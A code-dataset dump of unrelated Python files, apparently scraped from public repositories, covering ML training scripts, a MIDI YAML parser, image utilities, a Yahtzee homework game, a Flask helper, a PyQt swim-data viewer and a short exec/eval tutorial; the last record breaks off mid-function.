verbose=True, ewma=False, aggregate=False)\n\n exp.addconfig(\"data\", data.config)\n\n model = NotSoSmallLSTM(data)\n exp.addconfig(\"model\", model.config)\n from keras.utils import plot_model\n plot_model(model.model, to_file=exp.pnggraph, show_shapes=True)\n\n model.model.summary()\n # Fit the model\n histories = model.compile_fit(\n checkpointname=exp.modelname,\n epochs=EPOCHS,\n plateau_patience=5,\n stop_patience=15,\n verbose=1,\n batch_size=8192,\n best = True,\n )\n\n exp.addconfig(\"learning\", model.learning_config)\n exp.saveconfig(verbose=True)\n\n for el, history in enumerate(histories):\n plot_training(\n history,\n show=False,\n losspath=exp._pngloss(el + 1),\n accpath=exp._pngacc(el + 1))\n\n model.create_submission(\n exp.modelname,\n bincsv=exp.allpath(\"predictions_bin.csv\"),\n probacsv=exp.allpath(\"predictions_proba.csv\"))\n \n","sub_path":"src/models/nn/NotSoSmallLSTM.py","file_name":"NotSoSmallLSTM.py","file_ext":"py","file_size_in_byte":10755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"290756373","text":"\"\"\"\nDescription: yaml extensions for fluidpatcher\n\"\"\"\nimport re, oyaml\n\nnn = '[A-G]?[b#]?\\d*[.]?\\d+' # parameter number or scientific note name \nsfp = re.compile('^(.+\\.sf2):(\\d+):(\\d+)$', flags=re.I)\nmsg = re.compile(f'^(note|cc|prog|pbend|cpress|kpress|noteoff):(\\d+):({nn}):?(\\d+)?$')\nsyx = re.compile('^sysex:(.*?):(.+)$')\nrte = re.compile(f'^({nn})-({nn})\\*(-?[\\d\\.]+)([+-]{nn})$')\nfts = re.compile(f'^({nn})?-?({nn})?=?(-?{nn})?-?(-?{nn})?$')\nft1 = re.compile(f'^({nn})-({nn})=?(-?{nn})?-?(-?{nn})?$')\nft2 = re.compile(f'^({nn})=(-?{nn})?-?(-?{nn})?$')\nft3 = re.compile(f'^=(-?{nn})-?(-?{nn})?$')\n\ndef sift(s):\n try:\n s = float(s)\n except (ValueError, TypeError):\n return s\n else:\n if s.is_integer():\n s = int(s)\n return s\n\ndef scinote_to_val(n):\n if not isinstance(n, str):\n return n\n sci = re.findall('([+-]?)([A-G])([b#]?)(-?[0-9])', n)[0]\n sign = -1 if sci[0] == '-' else 1\n note = 'C D EF G A B'.find(sci[1])\n acc = ['b', '', '#'].index(sci[2]) - 1\n octave = int(sci[3])\n return sign * ((octave + 1) * 12 + note + acc)\n\ndef totups(x):\n if isinstance(x, RouterSpec):\n return [(x.min, x.max, x.mul, x.add)]\n elif isinstance(x, list):\n return [(val, val, 1.0, 0) for val in x]\n elif isinstance(x, int):\n return [(x, x, 1.0, 0)]\n elif isinstance(x, str):\n return [(scinote_to_val(x), scinote_to_val(x), 1.0, 0)]\n else: return [None]\n\ndef tochantups(x):\n if isinstance(x, FromToSpec):\n return [(x.min - 1, x.max - 1, 0.0, chto)\n for chto in range(x.tomin - 1, x.tomax)]\n elif isinstance(x, RouterSpec):\n return [(x.min - 1, x.max - 1, x.mul, x.mul + x.add - 1)]\n elif isinstance(x, list):\n return [(ch - 1, ch - 1, 1.0, 0) for ch in x]\n elif isinstance(x, int):\n return [(x- 1, x - 1, 1.0, 0)]\n else: return [None]\n\ndef tochanset(x):\n if isinstance(x, RouterSpec):\n return set(range(x.min - 1, x.max))\n elif isinstance(x, list):\n return set([ch - 1 for ch in x])\n elif isinstance(x, int):\n return {x - 1}\n else: return set()\n\ndef iterdata(x):\n if isinstance(x, (list, dict)):\n for item in x if isinstance(x, list) else x.values():\n if item is None: return None\n elif isinstance(item, (list, dict)):\n if iterdata(item) is None: return None\n return x\n\ndef parse(text):\n return iterdata(oyaml.safe_load(text))\n\ndef render(data):\n return oyaml.safe_dump(data)\n\n\nclass SFPreset(oyaml.YAMLObject):\n\n yaml_tag = '!sfpreset'\n yaml_loader = oyaml.SafeLoader\n yaml_dumper = oyaml.SafeDumper\n\n def __init__(self, sf, bank, prog):\n self.sf = sf\n self.bank = bank\n self.prog = prog\n \n def __repr__(self):\n return f\"{self.__class__.__name__}({self.sf}, {self.bank}, {self.prog})\"\n\n def __str__(self):\n return f\"{self.sf}:{self.bank:03d}:{self.prog:03d}\"\n\n @classmethod\n def from_yaml(cls, loader, node):\n sf, bank, prog = sfp.search(loader.construct_scalar(node)).groups()\n bank = int(bank)\n prog = int(prog)\n return cls(sf, bank, prog)\n\n @staticmethod\n def to_yaml(dumper, data):\n return dumper.represent_scalar('!sfpreset', str(data))\n\n\nclass MidiMsg(oyaml.YAMLObject):\n\n yaml_tag = '!midimsg'\n yaml_loader = oyaml.SafeLoader\n yaml_dumper = oyaml.SafeDumper\n\n def __init__(self, type, chan, par1, par2=None, yaml=''):\n self.type = type\n self.chan = chan - 1\n self.par1 = scinote_to_val(par1)\n self.par2 = par2\n self.argstr = ', '.join(map(str, [type, chan, par1, par2]))\n self.yaml = yaml\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({self.argstr})\"\n\n def __str__(self):\n return self.yaml\n\n def __iter__(self):\n return iter([self.type, self.chan, self.par1, self.par2])\n\n @classmethod\n def from_yaml(cls, loader, node):\n m = msg.search(loader.construct_scalar(node))\n type, chan, par1, par2 = map(sift, m.groups())\n return cls(type, chan, par1, par2, m[0])\n\n @staticmethod\n def to_yaml(dumper, data):\n return dumper.represent_scalar('!midimsg', str(data))\n\n\nclass SysexMsg(MidiMsg):\n\n yaml_tag = '!syxmsg'\n yaml_loader = oyaml.SafeLoader\n yaml_dumper = oyaml.SafeDumper\n\n def __init__(self, dest, data=[], file='', yaml=''):\n self.dest = dest\n self.data = data\n self.file = file\n self.argstr = ', '.join(map(str, [dest, data, file, yaml]))\n self.yaml = yaml\n\n def __iter__(self):\n return iter(self.data)\n\n @classmethod\n def from_yaml(cls, loader, node):\n s = syx.search(loader.construct_scalar(node))\n if ':' in s[2]:\n try:\n data = list(map(int, s[2].split(':')))\n except ValueError:\n data = list(map(lambda x: int(x, 16), s[2].split(':')))\n finally: return cls(s[1], data=[data], yaml=s[0])\n else: return cls(s[1], file=s[2], yaml=s[0])\n\n @staticmethod\n def to_yaml(dumper, data):\n return dumper.represent_scalar('!syxmsg', str(data))\n\n\nclass RouterSpec(oyaml.YAMLObject):\n\n yaml_tag = '!rspec'\n yaml_loader = oyaml.SafeLoader\n yaml_dumper = oyaml.SafeDumper\n \n def __init__(self, min, max, mul, add, yaml=''):\n self.min = scinote_to_val(min)\n self.max = scinote_to_val(max)\n self.mul = scinote_to_val(mul)\n self.add = scinote_to_val(add)\n self.argstr = ', '.join(map(str, [min, max, mul, add]))\n self.yaml = yaml\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({self.argstr})\"\n\n def __str__(self):\n return self.yaml\n\n @classmethod\n def from_yaml(cls, loader, node):\n spec = rte.search(loader.construct_scalar(node))\n min, max, mul, add = map(sift, spec.groups())\n return cls(min, max, mul, add, spec[0])\n\n @staticmethod\n def to_yaml(dumper, data):\n return dumper.represent_scalar('!rspec', str(data))\n\n\nclass FromToSpec(RouterSpec):\n\n yaml_tag = '!ftspec'\n yaml_loader = oyaml.SafeLoader\n yaml_dumper = oyaml.SafeDumper\n \n def __init__(self, min, max, tomin, tomax, yaml=''):\n if min == None: min, max = 0, 127\n self.min = scinote_to_val(min)\n self.max = scinote_to_val(max) if max != None else self.min\n self.tomin = scinote_to_val(tomin) if tomin != None else self.min\n if tomax != None: self.tomax = scinote_to_val(tomax)\n elif tomin != None: self.tomax = self.tomin\n else: self.tomax = self.max\n if self.min == self.max:\n self.mul = 1\n else:\n self.mul = (self.tomax - self.tomin) / (self.max - self.min)\n self.add = self.tomin - self.min * self.mul\n self.argstr = ', '.join(map(str, [min, max, tomin, tomax]))\n self.yaml = yaml\n\n @classmethod\n def from_yaml(cls, loader, node):\n spec = fts.search(loader.construct_scalar(node))\n min, max, tomin, tomax = map(sift, spec.groups())\n return cls(min, max, tomin, tomax, spec[0])\n \n @staticmethod\n def to_yaml(dumper, data):\n return dumper.represent_scalar('!ftspec', str(data))\n\n\nclass RouterRule(oyaml.YAMLObject):\n\n yaml_tag = '!rrule'\n yaml_loader = oyaml.SafeLoader\n yaml_dumper = oyaml.SafeDumper\n \n def __init__(self, type='', chan=None, par1=None, par2=None, **apars):\n self.type = type\n self.chan = tochantups(chan)\n self.par1 = totups(par1)\n self.par2 = totups(par2)[0]\n self.apars = apars\n rule = dict(type=type)\n for par, val in [('chan', chan), ('par1', par1), ('par2', par2)]:\n if val != None: rule[par] = val\n self.rule = {**rule, **apars}\n self.kwstr = ', '.join([f\"{k}={v}\" for k, v in self.rule.items()])\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({self.kwstr})\"\n\n def __str__(self):\n return str(self.rule)\n\n def __iter__(self):\n return iter(self.rule.items())\n\n def add(self, addfunc):\n for chan in self.chan:\n for par1 in self.par1:\n addfunc(self.type, chan, par1, self.par2, **self.apars)\n\n @classmethod\n def from_yaml(cls, loader, node):\n return cls(**loader.construct_mapping(node))\n\n @staticmethod\n def to_yaml(dumper, data):\n return dumper.represent_mapping('!rrule', data, flow_style=True)\n\n\nhandlers = dict(Loader=oyaml.SafeLoader, Dumper=oyaml.SafeDumper)\noyaml.add_implicit_resolver('!sfpreset', sfp, **handlers)\noyaml.add_implicit_resolver('!midimsg', msg, **handlers)\noyaml.add_implicit_resolver('!syxmsg', syx, **handlers)\noyaml.add_implicit_resolver('!rspec', rte, **handlers)\noyaml.add_implicit_resolver('!ftspec', ft1, **handlers)\noyaml.add_implicit_resolver('!ftspec', ft2, **handlers)\noyaml.add_implicit_resolver('!ftspec', ft3, **handlers)\nseqnode = oyaml.SequenceNode\nmapnode = oyaml.MappingNode\noyaml.add_path_resolver('!rrule', [(mapnode, 'router_rules'), (seqnode, None)], dict, **handlers)\noyaml.add_path_resolver('!rrule', [(mapnode, 'patches'), (mapnode, None), (mapnode, 'router_rules'), (seqnode, None)], dict, **handlers)\n","sub_path":"patcher/fpyaml.py","file_name":"fpyaml.py","file_ext":"py","file_size_in_byte":9276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501234649","text":"# @Email: jmaggio14@gmail.com\n# @Website: https://www.imagepypelines.org/\n# @License: https://github.com/jmaggio14/imagepypelines/blob/master/LICENSE\n# @github: https://github.com/jmaggio14/imagepypelines\n#\n# Copyright (c) 2018 Jeff Maggio, Nathan Dileas, Ryan Hartzell\ndef centroid(img):\n \"\"\"finds the centroid of the given image img\n\n Args:\n img (np.ndarray):\n input img to find the centroid of\n Returns:\n tuple: centroid of the input image (height,width)\n\n Example:\n >>> import imagepypelines as ip\n >>> lenna_centroid = centroid( ip.lenna() )\n \"\"\"\n centroid = img.shape[0]//2, img.shape[1]//2\n return centroid\n\n\ndef frame_size(img):\n \"\"\"return the height and width of a given img\n\n Args:\n img (np.ndarray): input img to find frame_size of\n\n Returns:\n tuple: frame_size, height and width of the input img\n\n Example:\n >>> import imagepypelines as ip\n >>> lenna_framesize = frame_size( ip.lenna() )\n \"\"\"\n frame_size = img.shape[0], img.shape[1]\n return frame_size\n\n\ndef dimensions(img, return_as_dict=False):\n \"\"\"\n function which returns the dimensions and data_type of a given image\n\n Args:\n img (np.ndarray): input image\n return_as_dict (bool): whether or not to return a dictionary.\n Default is False\n\n Returns:\n tuple: dimensions of the form (rows, cols, bands, dtype)\n\n Example:\n >>> import imagepypelines as ip\n >>> dims = dimensions( ip.lenna() )\n \"\"\"\n rows = img.shape[0]\n cols = img.shape[1]\n if img.ndim == 3:\n bands = img.shape[2]\n else:\n bands = 1\n dims = (rows, cols, bands, img.dtype)\n\n if return_as_dict:\n dims = dict(zip(('rows','cols','bands','dtype'), dims))\n\n return dims\n\n\n# END\n","sub_path":"imagepypelines/core/coordinates.py","file_name":"coordinates.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632321404","text":"import random\nscore = 999\ncost = 10\nscorew = 1000\nprint ('score: ' , score , 'points' , '\\n Cost to play = ', cost , ' points\\n' , 'Score to win: ' , scorew)\ndef YAHTZEE():\n keepPlaying = True\n while keepPlaying:\n Play = input('Please enter \"y\" if you want to play a round of the dice game or \"q\" if you want to quit game\\n If you want to restart then enter \"r\": ')\n print(' ')\n if Play != 'r':\n if Play == 'y':\n score-=cost\n if score < 0:\n print('insufficient score \\n YOU LOSE!!!')\n break\n elif score >= scorew:\n print(scorew, 'points! \\n YOU WIN!!!')\n continue\n print('score: ' , score , 'points')\n dice = [0,0,0,0,0]\n for i in range(0,len(dice)):\n dice[i] = random.randint(1,6)\n print('\\n roll 1' , dice , '\\n')\n triesleft = 2\n rnum = 2\n while triesleft > 0:\n use = int(input('How many dice do you want to re-roll?'))\n user = input('PLease choose the dice numbers you wish to re-roll:\\n ')\n if use == 1:\n a = int(user)\n dice[a-1] = random.randint(1,6)\n elif use == 2:\n a,b = user.split (\" \")\n for i in (int(a)-1,int(b)-1):\n dice[i] = random.randint(1,6)\n elif use == 3:\n a,b,c = user.split (\" \")\n for i in (int(a)-1,int(b)-1,int(c)-1):\n dice[i] = random.randint(1,6)\n elif use == 4:\n a,b,c,d = user.split (\" \")\n for i in (int(a)-1,int(b)-1,int(c)-1,int(d)-1):\n dice[i] = random.randint(1,6)\n elif use == 5:\n a,b,c,d,e = user.split (\" \")\n for i in (int(a)-1,int(b)-1,int(c)-1,int(d)-1,int(e)-1):\n dice[i] = random.randint(1,6)\n elif use == 0:\n break\n else:\n print('Sorry, input not recognized')\n break\n print ('\\n roll',rnum , dice , '\\n')\n triesleft = triesleft -1\n rnum = rnum+1\n final = []\n final.sort(reverse=True)\n for i in dice:\n final.append (dice.count(i))\n if final[0] == 5:\n score+=30\n print ('YAHTZEE! +30 points\\n' , 'score: ' , score , 'points')\n elif final[0] == 4:\n score+=20\n print ('Four of a kind! +20 points\\n' , 'score: ' , score , 'points')\n elif final.count(3) == 3 and final.count(2) == 2:\n score+=15\n print ('Full House! +15 points\\n' , 'score: ' , score , 'points')\n elif final[0] == 3:\n score+=10\n print ('Three of a kind! +10 points\\n' , 'score: ' , score , 'points')\n elif final.count(2) == 4:\n score+=5\n print ('Two Pairs. +5 points\\n' , 'score: ' , score , 'points')\n elif sum(final) == 5:\n score+=20\n print ('Straight! +20 points\\n' , 'score: ' , score , 'points')\n else:\n print(score)\n print('Sorry... you got nothing')\n else:\n keepPlaying = False\n elif Play == 'r':\n break\n else:\n break\n else:\n keepPlaying = False\n YAHTZEE()\nYAHTZEE()\n","sub_path":"Nooblet/Introduction to OOP/HW2.py","file_name":"HW2.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"184585277","text":"from .exceptions import ApiError\n\n# -----------------------------------------------------------------------------\n\n\nclass Related(object):\n def __init__(self, **kwargs):\n self._view_classes = kwargs\n\n def __call__(self, data, view):\n for field_name, view_class in self._view_classes.items():\n many = view.deserializer.fields[field_name].many\n self.resolve_nested(data, field_name, view_class, many=many)\n\n return data\n\n def resolve_nested(self, data, field_name, view_class, many=False):\n try:\n nested_data = data[field_name]\n except KeyError:\n # If this field were required, the deserializer already would have\n # raised an exception.\n return\n\n try:\n if many:\n if not nested_data:\n resolved = []\n else:\n view = view_class()\n resolved = [\n view.resolve_related_item(nested_datum)\n for nested_datum in nested_data\n ]\n else:\n resolved = view_class().resolve_related_item(nested_data)\n except ApiError as e:\n pointer = '/data/{}'.format(field_name)\n raise e.update({'source': {'pointer': pointer}})\n\n data[field_name] = resolved\n","sub_path":"flask_resty/related.py","file_name":"related.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575359852","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport dtcwt\nfrom pytorch_wavelets import DWT1DForward\n\nimport pdb\n\n\ndef logsumexp_2d(tensor):\n tensor_flatten = tensor.view(tensor.size(0), tensor.size(1), -1)\n s, _ = torch.max(tensor_flatten, dim=2, keepdim=True)\n outputs = s + (tensor_flatten - s).exp().sum(dim=2, keepdim=True).log()\n return outputs\n\nclass Flatten(nn.Module):\n def forward(self, x):\n return x.view(x.size(0), -1)\n\nclass ChannelGate(nn.Module):\n def __init__(self, gate_channels, reduction_ratio=16, pool_types=['avg', 'max']):\n super(ChannelGate, self).__init__()\n self.gate_channels = gate_channels\n self.mlp = nn.Sequential(\n Flatten(),\n nn.Linear(gate_channels, gate_channels // reduction_ratio),\n nn.ReLU(),\n nn.Linear(gate_channels // reduction_ratio, gate_channels)\n )\n self.pool_types = pool_types\n def forward(self, x, is_target=False): # x.shape -> [64, 64, 300]\n channel_att_sum = None\n for pool_type in self.pool_types:\n if pool_type=='avg':\n avg_pool = F.avg_pool1d(x, kernel_size=x.size(2), stride=x.size(2))\n channel_att_raw = self.mlp(avg_pool)\n elif pool_type=='max':\n max_pool = F.max_pool1d(x, kernel_size=x.size(2), stride=x.size(2))\n channel_att_raw = self.mlp(max_pool)\n if channel_att_sum is None:\n channel_att_sum = channel_att_raw\n else:\n channel_att_sum = channel_att_sum + channel_att_raw\n scale = F.sigmoid(channel_att_sum).unsqueeze(2).expand_as(x) # channel_att_sum.shape -> [64, 64]\n if is_target:\n scale = torch.ones_like(scale).cuda() - scale\n return x * scale\n\nclass BasicConv(nn.Module):\n def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, dilation=1, groups=1, relu=True, bn=True, bias=False):\n super(BasicConv, self).__init__()\n self.out_channels = out_planes\n self.conv = nn.Conv1d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=bias)\n self.bn = nn.BatchNorm1d(out_planes,eps=1e-5, momentum=0.01, affine=True) if bn else None\n self.relu = nn.ReLU() if relu else None\n def forward(self, x):\n x = self.conv(x)\n if self.bn is not None:\n x = self.bn(x)\n if self.relu is not None:\n x = self.relu(x)\n return x\n\nclass ChannelPool(nn.Module):\n def forward(self, x):\n return torch.cat((torch.max(x,1)[0].unsqueeze(1), torch.mean(x,1).unsqueeze(1), torch.std(x,1).unsqueeze(1)), dim=1)\n # return torch.cat((torch.max(x, 1)[0].unsqueeze(1), torch.mean(x, 1).unsqueeze(1)), dim=1)\n\nclass SpatialGate(nn.Module):\n def __init__(self):\n super(SpatialGate, self).__init__()\n kernel_size = 3\n self.compress = ChannelPool()\n self.spatial = BasicConv(3, 1, kernel_size, stride=1, padding=(kernel_size-1) // 2, relu=False)\n\n def sigmoid(self, x):\n return 1./(1.+torch.exp(-x))\n\n def forward(self, x, is_target=False):\n x_compress = self.compress(x)\n x_out = self.spatial(x_compress)\n scale = self.sigmoid(x_out) # broadcasting\n if is_target:\n scale = torch.ones_like(scale).cuda() - scale\n return x_compress * scale\n\n\nclass Feature(nn.Module):\n def __init__(self):\n super(Feature, self).__init__()\n self.conv_freq_1 = nn.Conv1d(1, 32, kernel_size=4, stride=1, padding=1)\n self.conv_freq_2 = nn.Conv1d(1, 64, kernel_size=5, stride=1, padding=2)\n self.conv_freq_3 = nn.Conv1d(1, 64, kernel_size=5, stride=1, padding=2)\n\n self.conv_time_1 = nn.Conv1d(1, 32, kernel_size=4, stride=1, padding=1)\n self.bn1 = nn.BatchNorm1d(32)\n\n self.conv_time_2 = nn.Conv1d(32, 64, kernel_size=4, stride=1, padding=2)\n self.bn2 = nn.BatchNorm1d(64)\n\n self.conv_time_3 = nn.Conv1d(32, 64, kernel_size=5, stride=1, padding=2)\n self.bn3 = nn.BatchNorm1d(64)\n\n self.maxpool = nn.MaxPool1d(stride=2, kernel_size=2) # max is better than average\n self.avgpool = nn.AvgPool1d(stride=2, kernel_size=2)\n self.relu = nn.ReLU()\n\n self.channel_1 = ChannelGate(32, pool_types=['avg', 'max'])\n self.SpatialGate = SpatialGate()\n\n self.transform = DWT1DForward(wave='haar', J=3).cuda()\n self.channel_1 = ChannelGate(32, pool_types=['avg','max'])\n # self.channel_2 = ChannelGate(64, pool_types=['avg', 'max'])\n\n def forward(self, x, is_target=False):\n x_0 = x\n # db: zh[0] -> 64,1,605 haar: 600\n # zh[1] -> 64,1,308 300\n # zh[2] -> 64,1,159 150\n zl, zh = self.transform(x)\n z1 = self.conv_freq_1(zh[0]) # 64, 16, 600\n z2 = self.conv_freq_2(zh[1]) # 64, 32, 300\n # z3 = self.conv_freq_3(zh[2]) # 64, 64, 150\n\n x = self.maxpool(self.relu(self.bn1(self.conv_time_1(x_0))))+z1\n x = self.maxpool(self.relu(self.bn2(self.conv_time_2(x))))+z2\n # x = self.maxpool(self.relu(self.bn3(self.conv_time_3(x)))) + z3\n\n # x = self.SpatialGate(x)\n\n return x\n\nclass Predictor(nn.Module):\n def __init__(self, prob=0.5):\n super(Predictor, self).__init__()\n self.fc1 = nn.Linear(64*300, 1000)\n self.bn1_fc = nn.BatchNorm1d(1000)\n self.fc3 = nn.Linear(1000, 3)\n self.bn_fc3 = nn.BatchNorm1d(3)\n self.relu = nn.ReLU()\n self.prob = prob\n\n def set_lambda(self, lambd):\n self.lambd = lambd\n\n def forward(self, x, reverse=False):\n x = x.view(x.size(0), 64*300)\n x = F.dropout(x, training=self.training, p=self.prob)\n x = self.relu(self.bn1_fc(self.fc1(x)))\n x = self.fc3(x)\n return x\n","sub_path":"model/CWRU.py","file_name":"CWRU.py","file_ext":"py","file_size_in_byte":5915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590031291","text":"var_x = 10\n\nsource = '''\nnew_var = 1\nfor i in range(var_x):\n print('-'*i)\n new_var += 1\n'''\n\nresult = exec(source)\nprint(result)\n\nprint(var_x)\nprint(new_var)\n\nsource = input(\"Enter your expression: \")\nprint(eval(source))","sub_path":"LVL 2/SEKCJA 3/39. Funkcja exec.py","file_name":"39. Funkcja exec.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"265097493","text":"from core import utils\n\nurls_template = [\n ('test', False),\n ('https://test.zp.com', True),\n ('https://stackoverflow.com/questions/41124591/setting-up-periodic'\n '-tasks-in-celery-celerybeat-dynamically-using-add-periodic', True),\n ('https://web.skype.com/ru/?intsrc=client-_-webapp-_-production-_-go-signin', True),\n ('http:test.example.com', False),\n ('https//some.url.com', False),\n ('hTtPS://test.some.url', False),\n ('www.test.com.ua', False),\n ('https://www.google.com.ua/search?q=celerybeat-schedule+file&oq='\n 'celerybeat+file&aqs=chrome.1.69i57j0l3.4701j0j7&sourceid=chrome&ie=UTF-8', True)\n]\n\n\nurls = (\n (\n 'https://www.facebook.com/',\n dict(url='https://www.facebook.com/', status=200, failed_requests=0)\n ),\n (\n 'https://test.zp.com',\n dict(url='https://test.zp.com', status=None, failed_requests=1)\n )\n)\n\n\ndef test_check_url():\n for url_pair in urls_template:\n url, answer = url_pair\n assert utils.check_url(url) is answer\n\n\ndef test_initial_request():\n for pair in urls:\n url, answer = pair\n assert utils.initial_request(url) == answer\n","sub_path":"tests/core/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130822446","text":"import sys\n\nfrom Project.WinUI.Controller import Files\nfrom Project.WinUI.WindowUI import Ui_MainWindow\nfrom PyQt5.QtWidgets import QMainWindow, QApplication\nfrom PyQt5 import QtWidgets, QtCore, QtGui\nimport matplotlib.pyplot as plt\n\n\nclass MyWindow(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MyWindow, self).__init__(parent)\n self.setupUi(self)\n self.controller = Files()\n self.detail_items = [\"主要泳姿\", \"总时间\", \"游泳距离\", \"划臂次数\", \"单次划臂时间\", \"平均配速\", \"最大配速\", \"平均频率\", \"最大频率\"]\n self.summary_time.setDisplayFormat(\"HH:mm:ss\")\n self.tableView_detail.setGeometry(QtCore.QRect(360, 20, 240, 300))\n\n self.refresh_list_swim_view()\n self.refresh_frame_sum()\n\n self.listView_swims.clicked.connect(self.refresh)\n self.bt_summary.clicked.connect(self.change_to_summary)\n self.bt_detail.clicked.connect(self.change_to_detail)\n self.bt_quit.clicked.connect(QtWidgets.qApp.quit)\n\n def retranslateUi(self, MainWindow):\n Ui_MainWindow.retranslateUi(self, MainWindow)\n self.tableView_detail.close()\n\n def refresh_list_swim_view(self):\n list_model = QtCore.QStringListModel(self.controller.swim_file_list)\n self.listView_swims.setModel(list_model)\n\n def change_to_summary(self):\n self.tableView_detail.close()\n self.frame_sum.show()\n self.refresh_frame_sum()\n\n def change_to_detail(self):\n self.frame_sum.close()\n self.tableView_detail.show()\n self.refresh_table_view()\n\n def refresh(self):\n self.refresh_frame_sum()\n self.refresh_table_view()\n\n def refresh_table_view(self):\n pos = self.listView_swims.currentIndex()\n self.detail_model = QtGui.QStandardItemModel(5, 2)\n self.detail_model.setHorizontalHeaderLabels([\"类别\", \"数据\"])\n for j in range(9):\n self.detail_model.setItem(j, 0, QtGui.QStandardItem(self.detail_items[j]))\n self.detail_model.setItem(0, 1, QtGui.QStandardItem(self.controller.swim_list[pos.row()].name))\n self.detail_model.setItem(1, 1, QtGui.QStandardItem(\n str(round(self.controller.swim_list[pos.row()].all_time // 1000, 2)) + \"s\"))\n self.detail_model.setItem(2, 1, QtGui.QStandardItem(str(self.controller.swim_list[pos.row()].pool)))\n self.detail_model.setItem(3, 1, QtGui.QStandardItem(str(self.controller.swim_list[pos.row()].number)))\n self.detail_model.setItem(4, 1,\n QtGui.QStandardItem(\n str(round(self.controller.swim_list[pos.row()].once_time / 1000, 3)) + \" s\"))\n self.detail_model.setItem(5, 1,\n QtGui.QStandardItem(\n str(round(self.controller.swim_list[pos.row()].averagepace, 2)) + \" s/100m\"))\n self.detail_model.setItem(6, 1,\n QtGui.QStandardItem(\n str(round(self.controller.swim_list[pos.row()].maxpace, 2)) + \" s/100m\"))\n self.detail_model.setItem(7, 1,\n QtGui.QStandardItem(\n str(round(self.controller.swim_list[pos.row()].averagerate, 2)) + \" times/10s\"))\n self.detail_model.setItem(8, 1,\n QtGui.QStandardItem(\n str(round(self.controller.swim_list[pos.row()].maxrate, 2)) + \" times/10s\"))\n self.tableView_detail.setModel(self.detail_model)\n\n def refresh_frame_sum(self):\n pos = self.listView_swims.currentIndex()\n self.text_main_swim.setText(self.controller.swim_list[pos.row()].name)\n hour = self.controller.swim_list[pos.row()].all_time // 1000 // 60 // 60\n minute = self.controller.swim_list[pos.row()].all_time // 1000 // 60 % 60\n sec = self.controller.swim_list[pos.row()].all_time // 1000 % 60\n self.summary_time.setTime(QtCore.QTime(hour, minute, sec))\n self.label_calorie_num.setText(str(round(self.controller.swim_list[pos.row()].all_time / 1000 * 0.8, 2)) + \"千卡\")\n try:\n self.label_average_speed_num.setText(str(round(self.controller.swim_list[pos.row()].duration * 100 / (\n self.controller.swim_list[pos.row()].number * self.controller.swim_list[pos.row()].arm_stroke), 2)))\n except Exception:\n self.label_average_speed_num.setText(\"NAN\")\n\n x = [str(i * 10) + \"\" for i in range(len(self.controller.swim_list[pos.row()].avgepace))]\n plt.subplot(211)\n plt.plot(x, self.controller.swim_list[pos.row()].avgepace)\n plt.title(\"平均配速\", fontproperties=\"SimHei\")\n plt.subplots_adjust(hspace=0.5)\n x = [str(i * 10) + \"\" for i in range(len(self.controller.swim_list[pos.row()].avgerate))]\n plt.subplot(212)\n plt.plot(x, self.controller.swim_list[pos.row()].avgerate)\n plt.title(\"平均频率\", fontproperties=\"SimHei\")\n plt.savefig(\"mat\", dpi=1000)\n plt.clf()\n self.pixmap = QtGui.QPixmap(\"mat.png\")\n self.label_main_image.setPixmap(self.pixmap)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myWin = MyWindow()\n myWin.show()\n sys.exit(app.exec_())\n","sub_path":"Project/WinUI/starter.py","file_name":"starter.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"167515419","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom load_data import load_data\nfrom model1 import FullyConnectedNetwork\nfrom model2 import FCNetworkMiniBatch\nfrom cnn_keras import CnnKeras\n\ndef plot():\n rates = [0.001]\n num_epoch = 201\n batch_size = 100\n steps = 3001\n for rate in rates:\n # fnc = FCNetworkMiniBatch(num_epoch=num_epoch, batch_size=batch_size,\n # learning_rate=rate)\n fnc = FullyConnectedNetwork(num_steps=steps, learning_rate=rate)\n with np.load('eval_%s.npz' % fnc.param_str()) as npz:\n plt.plot(npz['valid_accuracy'], label=rate.__str__())\n plt.legend(list(map(lambda x: x.__str__(), rates)), loc='lower right')\n plt.xlabel('epoch')\n plt.ylabel('validation accuracy')\n plt.title('learning curve')\n plt.show()\n\ndef plot_mini_batch():\n rate = 0.001\n num_epoch = 301\n batch_sizes = [100, 500, 1000, 1500, 2000]\n # steps = 30001\n for batch_size in batch_sizes:\n fnc = FCNetworkMiniBatch(num_epoch=num_epoch, batch_size=batch_size,\n learning_rate=rate)\n with np.load('mini/eval_%s.npz' % fnc.param_str()) as npz:\n plt.plot(npz['valid_accuracy'], label=batch_size.__str__())\n plt.legend(list(map(lambda x: x.__str__(), batch_sizes)), loc='lower right')\n plt.xlabel('epoch')\n plt.ylabel('validation accuracy')\n plt.title('learning curve')\n plt.show()\n\ndef collect_data():\n # rates = [0.005, 0.001, 0.0005]\n rates = [0.5]\n num_epoch = 501\n batch_sizes = [100, 2000]\n steps = 501\n # for rate in rates:\n # fnc = 